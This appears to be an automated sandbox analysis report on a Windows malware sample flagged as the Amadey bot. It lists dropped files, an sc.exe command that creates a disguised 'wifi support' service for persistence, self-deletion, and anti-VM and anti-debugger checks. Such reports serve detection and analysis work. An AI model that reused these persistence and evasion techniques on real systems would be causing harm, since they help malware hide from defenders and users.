Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

Persistence and Installation Behavior:

Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown Executable created and started: C:\Windows\SysWOW64\shayesoq\lagavljy.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uufaeea
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7801.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\86C4.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
Source: C:\Users\user\AppData\Local\Temp\86C4.exe File created: C:\Users\user\AppData\Local\Temp\lagavljy.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ACEF.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7CA1.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8ED5.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\BEB3.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9A02.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CC60.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D984.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B58B.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
Source: C:\Windows\SysWOW64\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\shayesoq
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\u3e7zmaux2.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Code function: 20_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Process information set: NOGPFAULTERRORBOX (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Process information set: NOGPFAULTERRORBOX (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe Process information set: NOOPENFILEERRORBOX (23 occurrences)
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe Process information set: NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe Process information set: NOOPENFILEERRORBOX (31 occurrences)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: U3E7zMaux2.exe, 00000001.00000002.713262263.00000000006A7000.00000004.00000020.sdmp, E666.exe, 00000013.00000002.784251113.000000000072B000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\U3E7zMaux2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Roaming\uufaeea Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\E666.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Code function: 20_2_00406AA0
Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evasive API call chain: GetComputerName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\explorer.exe TID: 7128 Thread sleep time: -31300s >= -30000s
Source: C:\Windows\explorer.exe TID: 7116 Thread sleep time: -31300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe TID: 2228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5896 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5532 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 5532 Thread sleep time: -42000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7801.exe TID: 5040 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 occurrences)
Source: C:\Users\user\Desktop\U3E7zMaux2.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\86C4.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 605
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 408
Source: C:\Users\user\AppData\Local\Temp\D984.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe API coverage: 6.9 %
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Code function: 20_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CC60.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ACEF.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BEB3.exe
Source: C:\Users\user\AppData\Local\Temp\7801.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe Evaded block: after key decision
Source: C:\Windows\SysWOW64\svchost.exe Evaded block: after key decision
Source: C:\Windows\SysWOW64\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\svchost.exe Code function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000007.00000000.679970478.000000000FD46000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
                          Source: explorer.exe, 00000007.00000000.673323563.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000007.00000000.706025644.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000001D.00000002.827857689.00000188ABAA6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@6
                          Source: explorer.exe, 00000007.00000000.693238319.000000000A83C000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
                          Source: WerFault.exe, 00000012.00000002.796335241.00000000010C0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000007.00000000.676806232.000000000A9AE000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA}
                          Source: explorer.exe, 00000007.00000000.672052714.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: svchost.exe, 0000001D.00000002.827601937.00000188ABA5B000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.825677547.00000188ABA5A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWdisplaycatalog.mp.micros
                          Source: explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: explorer.exe, 00000007.00000000.706825764.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          Found API chain indicative of debugger detection
                          Source: C:\Windows\SysWOW64\svchost.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\uufaeea | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00530042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 17_2_00520083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00460083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_00460083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_0047092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_00470D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: 43_2_02EA0083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: 43_2_02F70D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: 43_2_02F7092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\E666.exe | Process queried: DebugPort
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_0040F0AE CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Memory protected: page guard
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00403C44 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00408848 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_0040383B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00407A0C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
